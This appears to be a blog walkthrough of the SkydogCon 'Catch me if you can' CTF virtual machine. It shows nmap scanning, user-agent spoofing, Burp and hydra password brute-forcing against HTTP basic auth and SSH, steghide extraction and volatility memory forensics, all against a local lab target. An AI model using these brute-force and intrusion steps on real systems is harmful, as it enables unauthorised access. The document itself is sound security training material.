SkydogCon CTF: catch me if you can Walkthrough

In this post, I will show you the walkthrough of SkydogCon CTF: Catch me if you can. You can download the VM from here, the author is jamesbower.

attack machine: 192.168.56.101  
target machine: 192.168.56.102  

use Nmap check open ports and services

Nmap scan report for 192.168.56.102  
Host is up (0.00036s latency).  
Not shown: 65531 filtered ports  
PORT      STATE  SERVICE  VERSION  
22/tcp    closed ssh  
80/tcp    open   http     Apache httpd 2.4.18 ((Ubuntu))  
443/tcp   open   ssl/http Apache httpd 2.4.18 ((Ubuntu))  
22222/tcp open   ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)  
MAC Address: 08:00:27:D3:70:74 (Oracle VirtualBox virtual NIC)  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
Flag 1

well, the 22 port is closed, but there is another ssh service on port 22222.
check it:

root@evilc:/home/skydog# ssh root@192.168.56.102 -p 22222  
###############################################################
#                         WARNING                             #
#               FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#       Flag{53c82eba31f6d416f331de9162ebe997}                #
###############################################################
root@192.168.56.102's password:  
Permission denied, please try again.  
root@192.168.56.102's password:  

get the first flag, and decode it content:

Flag{53c82eba31f6d416f331de9162ebe997}  # md5 decode encrypt  
Flag2

check the 80. get a website and a list of hints for each flag:

FLAGS

Flag#1 - "Don’t go Home Frank! There’s a Hex on Your House"

Flag#2 - “Obscurity or Security? That is the Question"

Flag#3 - “During his Travels Frank has Been Known to Intercept Traffic"

Flag#4 - “A Good Agent is Hard to Find"

Flag#5 - “The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices"

Flag#6 - “Where in the World is Frank?"

Flag#7 - “Frank Was Caught on Camera Cashing Checks and Yelling - I’m The Fastest Man Alive!"

Flag#8 - “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!"  

Well...I can't find any relation between the first flag and the hint. Maybe I'm wrong, it's not the first flag?
check source page:
find something:

<!--[if IE 8]> <html lang="en" class="ie8"> <![endif]-->  
<!--[if IE 9]> <html lang="en" class="ie9"> <![endif]-->  
<!--[If IE4]><script src="/oldIE/html5.js"></script><![Make sure to remove this before going to PROD]-->  
<!--[if !IE]><!-->  

there is a link, check it:
flag well, this seems like a hex, and it fit the hint for first flag. convert it:

root@evilc:/home/skydog# echo "666c61677b37633031333230373061306566373164353432363633653964633166356465657d" | xxd -r -ps  
flag{7c0132070a0ef71d542663e9dc1f5dee}  

decode it, get another hint:nmap.
Well, it seems with this hint, I can use nmap find an open ssh port 22222 except 22. Anyway, I finish the first two flags.

Flag 3

According to the hint, I need to intercept the traffic, so I try to use Wireshark, to intercept traffic, hoping the target machine can send me some message or give me some hint, but I got nothing.
I notice the 443 port is open, so I check the SSL certificate:
cert (Aha! My firefox's language is Chinese) get the third flag:

flag3{f82366a9ddc064585d54e3f78bde3221} # md5 decode personnel  

and a hint personnel.

Flag 4

I stuck here for a while. Then I decided to try it as a URL, and I got a new web page:

root@evilc:/home/skydog# curl 192.168.56.102/personnel  
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....  

and the hint for flag 4 is "A good agent is hard to find".
Well, it seems like I need to modify the user-agent, but what kind of User-agent? The only thing I got is just something related to FBI.

Go back to the web page, search it, find something in that js file for IE4:

/* maindev -  6/7/02 Adding temporary support for IE4 FBI Workstations */
/* newmaindev -  5/22/16 Last maindev was and idoit and IE4 is still Gold image -@Support doug.perterson@fbi.gov */

So, I just need to switch the header to IE 4.0. I got the header from here, use Firefox add-ons: user agent switcher.
and Got it:
flag 4 and a clue!

flag{14e10d570047667f904261e6d08f520f}  # md5 decode evidence  
# thus the clue is 
newevidence  
Flag 5

check the web page, there are some names here, search them, I finally got it is a movie... but nothing interesting find.
The hint is "The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices"
Try newevidence a url, get a web page, with basic authentication.
Well, key word: details, dialogue, simple, guessable and personal.
The title of this page is Welcome Agent Hanratty.
So I find all the quotes from Hanratty in this movie from here Create a username list by this agent's name Carl Hanratty.
use cwel make a password list. According to the result of burp suite, the basic authentication format is base64(username:password), and
use burp suite crack it.
It takes me over 6 hours to crack the username and password.
After I finish the BBQ with my friends. I got username and password:

carl.hanratty:Grace  

login, get a new page:
evidence check the Evidence Summary File, get the fifth flag, decode it:

flag{117c240d49f54096413dd64280399ea9}  # md5 deocde panam  
Flag 6

Well. I don't know what I can do about this panam (airline name), so I just mark it, and continue for more. With the hint, I notice there must be something hidden in this web page:
when I download the image.jpg from URL Possible Location, use binwalk check it:

root@evilc:/home/skydog# binwalk image.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION  
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01  
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10  

But I can't extract it with binwalk, so I use another file steghide(install through apg-get)

root@evilc:/home/skydog# steghide extract -sf image.jpg  
Enter passphrase:  

try panam, and success!

root@evilc:/home/skydog# steghide extract -sf image.jpg  
Enter passphrase:  
the file "flag.txt" does already exist. overwrite ? (y/n) y  
wrote extracted data to "flag.txt".  
root@evilc:/home/skydog#  
root@evilc:/home/skydog# cat flag.txt  
flag{d1e5146b171928731385eb7ea38c37b8}  
=ILoveFrance

clue=iheartbrenda  

get the sixth flag, and two hints!

Flag 7

I walk around the website, and got nothing, so I think it might be the time for ssh port login. But I need a username and password, the clue "ILoveFrance" and "ihearthrenda" looks like password. Where is the username?
Check the hint for flag 7, it's about the fastest man alive. Google it, I find to man: Usain Bolt and The Flash (Barry Allen)
So I use these two names create a new username list, and use those two clues create a password list.
use hydra bruteforce it:

root@evilc:/home/skydog# hydra -L username.lst -P password.lst ssh://192.168.56.102:22222  
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-13 17:23:57  
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 18 login tries (l:9/p:2), ~0 tries per task
[DATA] attacking service ssh on port 22222
[22222][ssh] host: 192.168.56.102   login: barryallen   password: iheartbrenda

login, get the 7th flag.

root@evilc:/home/skydog# ssh barryallen@192.168.56.102 -p 22222  
###############################################################
#                         WARNING                             #
#               FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#       Flag{53c82eba31f6d416f331de9162ebe997}                #
###############################################################
barryallen@192.168.56.102's password:  
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-83-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

101 packages can be updated.  
0 updates are security updates.


Last login: Thu Jul 13 15:21:14 2017 from 192.168.56.101  
barryallen@skydogconctf2016:~$ id  
uid=1001(barryallen) gid=1001(barryallen) groups=1001(barryallen)  
barryallen@skydogconctf2016:~$ ls  
flag.txt  security-system.data  
barryallen@skydogconctf2016:~$ cat flag.txt  
flag{bd2f6a1d5242c962a05619c56fa47ba6}  

decode it:

flag{bd2f6a1d5242c962a05619c56fa47ba6}  # md5 decode theflash  
Flag 8

The hint of flag 8, got the keyword: memory.
there is another file name security-system.data
send it back our attack machine. it's a zip file, unzip it. use binwalk analysis it:

root@evilc:/home/skydog# binwalk security-system.data 

DECIMAL       HEXADECIMAL     DESCRIPTION  
--------------------------------------------------------------------------------
150720        0x24CC0         Microsoft executable, portable (PE)  
656418        0xA0422         Copyright string: "Copyright 1985-1998,Phoenix Technologies Ltd.All rights reserved."  
819330        0xC8082         Copyright string: "Copyright (C) 2003-2014  VMware, Inc."  
819369        0xC80A9         Copyright string: "Copyright (C) 1997-2000  Intel Corporation"  
985388        0xF092C         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."  
996673        0xF3541         Copyright string: "Copyright 2000-2015 VMware, Inc."  
1000211       0xF4313         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."  
5074944       0x4D7000        Microsoft executable, portable (PE)  
5894224       0x59F050        Copyright string: "Copyright (C) Rational Systems, Inc."  
6758664       0x672108        CRC32 polynomial table, little endian  
7143424       0x6D0000        Microsoft executable, portable (PE)  
---------------snip-------------------------------

it's a system memory dump.
Use tool volatility, and the help of this tutorial

root@evilc:/home/skydog# volatility imageinfo -f security-system.data  
Volatility Foundation Volatility Framework 2.6  
INFO    : volatility.debug    : Determining profile based on KDBG search...  
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)        
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)                                  
                     AS Layer2 : FileAddressSpace (/home/skydog/security-system.data)            
                      PAE type : PAE            
                           DTB : 0x33e000L      
                          KDBG : 0x80545b60L    
          Number of Processors : 1              
     Image Type (Service Pack) : 3              
                KPCR for CPU 0 : 0xffdff000L    
             KUSER_SHARED_DATA : 0xffdf0000L    
           Image date and time : 2016-10-10 22:00:50 UTC+0000                                    
     Image local date and time : 2016-10-10 18:00:50 -0400

It's a WinXPSP2x86 system, use plugin filescan check interesting files:

root@evilc:/home/skydog# volatility --profile=WinXPSP2x86 -f security-system.data filescan  > filename  
Volatility Foundation Volatility Framework 2.6  
root@evilc:/home/skydog# cat filename | grep flag  
root@evilc:/home/skydog# cat filename | grep .txt          0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt  
0x000000000629fc08      1      0 R--rw- \Device\HarddiskVolume1\Program Files\VMware\VMware Tools\vmacthlp.txt        0x00000000062c4620      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt  
0x00000000062c4be8      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt  
0x00000000062e04b0      1      0 R--r-d \Device\HarddiskVolume1\Documents and Settings\test\Recent\code.txt.lnk       0x00000000063b4428      1      0 R--r-- \Device\HarddiskVolume1\System Volume Information\_restore{FA371F61-4781-4A7F-99F2-B979D68F9988}\drivetable.txt  
0x0000000006503e60      4      2 -W-rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware VGAuth\logfile.txt.00x000000000663d4c0      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\win7gadgets.txt0x000000000663d6b8      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vmwarefilters.txt0x000000000663d8b0      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\visualstudio2005.txt0x000000000663daa8      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vistasidebar.txt0x000000000663dca0      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\microsoftoffice.txt0x000000000663de98      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\googledesktop.txt0x000000000663f970      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\manifest.txt  
0x0000000006640bc8      1      0 R--rwd \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt  

I think the code.txt must be something important. So I spend a long time try to read the note.txt file. But it seems I can't do that (I'm sooooo weak)
So I try to use other plugins

root@evilc:/home/skydog# volatility --profile=WinXPSP2x86 -f security-system.data cmdscan  
Volatility Foundation Volatility Framework 2.6  
**************************************************
CommandProcess: csrss.exe Pid: 560  
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset  
CommandCount: 2 LastAdded: 1 LastDisplayed: 1  
FirstCommand: 0 CommandCountMax: 50  
ProcessHandle: 0x2d4  
Cmd #0 @ 0x1024400: cd Desktop  
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt  

Bingo!
convert it!

flag{841dd3db29b0fbbd89c7b5be768cdc81}  # md5 decode Two[space]little[space]mice  

Now I got all the flags, but what is "two little mice"?
Google it, find it in Wikiquote, it's coming from agent Frank Abagnale Sr.

Two little mice fell in a bucket of cream. The first mouse quickly gave up and drowned. The second mouse, wouldn't quit. He struggled so hard that eventually he churned that cream into butter and crawled out. Gentlemen, as of this moment, I am that second mouse.  

Good one, I'm the second mouse too.
Done, Amazing.